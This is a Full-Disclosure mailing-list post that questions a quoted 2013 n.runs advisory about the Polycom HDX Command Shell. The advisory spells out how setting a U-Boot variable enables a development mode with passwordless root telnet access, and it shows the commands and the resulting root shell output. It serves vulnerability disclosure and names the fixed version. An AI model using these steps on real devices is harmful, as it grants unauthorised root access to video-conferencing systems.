Why exactly is this a bug? 2013/3/15 <secur...@nruns.com>
> n.runs AG > http://www.nruns.com/ > security(at)nruns.com > n.runs-SA-2013.001 15-Mar-2013 > ___________________________________________________________________________ > Vendor: Polycom, http://www.polycom.com > Affected Products: Polycom HDX Series > Affected Version: < 3.1.1.2 > Vulnerability: Polycom Command Shell Grants System-Level Access > Risk: LOW > ___________________________________________________________________________ > > Overview: > > The Polycom Command Shell is a command-line based administrative interface > to the Polycom HDX system. It can be accessed either via a RS-232 serial > connection or via telnet on port 23. > > Description: > > The Polycom Command Shell can be used to view and also change several > settings of the system. However it can also be used to get system-level > access (i.e. root access) to the HDX system. The "printenv" and "setenv" > commands can be used to read and write variables respectively which are > stored in flash memory. > > The easiest way to get root access to the HDX system is to enable the > "development mode" of the system which will then enable a telnet server > where a root login without a password is possible. In order to enable > the development mode, the "devboot" U-Boot environment variable must > be set. This can be done through the Polycom Command Shell with the > following commands: > > $ cu -l ttyUSB0 -s 9600 > -> setenv othbootargs "devboot=bogus" > -> reboot > reboot, are you sure? <y,n> y > > This will reboot the system and enable a telnet server where a login as > root is possible. > > $ telnet 192.168.0.218 > Trying 192.168.0.218... > Connected to 192.168.0.218. > Escape character is '^]'. > > hdx7000.lan login: root > ## Error: "vidoutsize" not defined > # id > uid=0(root) gid=0(root) > # uname -a > Linux hdx7000.lan 2.6.18.1.p2.14 #1 PREEMPT Wed Feb 3 10:25:31 CST 2010 > ppc unknown > # > > Impact: > > Someone with legitimate access to the Polycom Command Shell can get > direct system-level access to the underlying embedded Linux system. > This can be used to further analyze the system. > > Solution: > > Polycom released version 3.1.1.2 of the HDX software which fixes this > issue. It can be downloaded from the Polycom Support page at > http://support.polycom.com. > ___________________________________________________________________________ > > Credit: > Bug found by Moritz Jodeit of n.runs AG. > ___________________________________________________________________________ > > Unaltered electronic reproduction of this advisory is permitted. For all > other reproduction or publication, in printing or otherwise, contact > secur...@nruns.com for permission. Use of the advisory constitutes > acceptance for use in an "as is" condition. All warranties are excluded. > In no event shall n.runs be liable for any damages whatsoever including > direct, indirect, incidental, consequential, loss of business profits or > special damages, even if n.runs has been advised of the possibility of > such damages. > > Copyright 2013 n.runs AG. All rights reserved. Terms of use apply. > > _______________________________________________ > Full-Disclosure - We believe in it. > Charter: http://lists.grok.org.uk/full-disclosure-charter.html > Hosted and sponsored by Secunia - http://secunia.com/ >
_______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
